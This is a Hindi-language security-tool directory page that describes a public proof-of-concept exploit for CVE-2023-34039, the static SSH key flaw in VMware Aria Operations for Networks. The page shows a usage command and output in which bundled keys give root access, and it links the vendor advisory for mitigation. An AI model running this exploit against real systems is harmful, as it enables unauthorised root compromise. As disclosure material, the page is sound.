Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-34039 — VMWare Aria Operations for Networks (vRealize Network Insight) स्टैटिक SSH कुंजी RCE (CVE-2023-34039) | Kitploit
उपकरण/GitHubGitHub/sinsinology/cve-2023-34039
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षारिमोट एक्सेस टूल
GitHubsinsinology/cve-2023-34039

CVE-2023-34039

VMWare Aria Operations for Networks (vRealize Network Insight) स्टैटिक SSH कुंजी RCE (CVE-2023-34039)

रिपॉजिटरी देखें
97312 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-34039

CVE-2023-34039 के लिए POC - VMWare Aria Operations for Networks (vRealize Network Insight) स्टैटिक SSH कुंजी RCE

तकनीकी विश्लेषण

इस कमजोरी का मूल कारण विश्लेषण मेरे ब्लॉग पर पाया जा सकता है:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

poc

सारांश

VMWare Aria Operations for Networks (vRealize Network Insight) के संस्करण 6.0 से 6.10 ने support और ubuntu उपयोगकर्ताओं के लिए SSH कुंजियों को पुनर्जीवित नहीं किया, जिससे SSH पहुंच वाले हमलावर को इस उत्पाद तक root शेल पहुंच प्राप्त करने की अनुमति मिली।

यह समस्या VMWare को सूचित की गई थी Harsh Jaiswal (@rootxharsh) और Rahul Maini (@iamnoooob) द्वारा ProjectDiscovery Research में

मैंने सिर्फ एक्सप्लॉइट लिखा है, अगर आप इसे ऐसा कह सकते हैं, क्योंकि यह मूलतः एक ssh कमांड रैपर है।

उपयोग

root@kitploit:~
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

शमन उपाय

नवीनतम संस्करण में अपडेट करें या प्रोग्रेस एडवाइजरी के निर्देशों का पालन करके शमन करें

  • https://www.vmware.com/security/advisories/VMSA-2023-0018.html

अधिक सुरक्षा अनुसंधान के लिए हमें फॉलो करें:

  • SinSinology
  • SummoningTeam

अस्वीकरण

यह सॉफ्टवेयर पूरी तरह से शैक्षिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग सिस्टम पर हमला करने के लिए नहीं है, सिवाय इसके कि जहां स्पष्ट रूप से अधिकृत किया गया हो। प्रोजेक्ट मेंटेनर्स सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें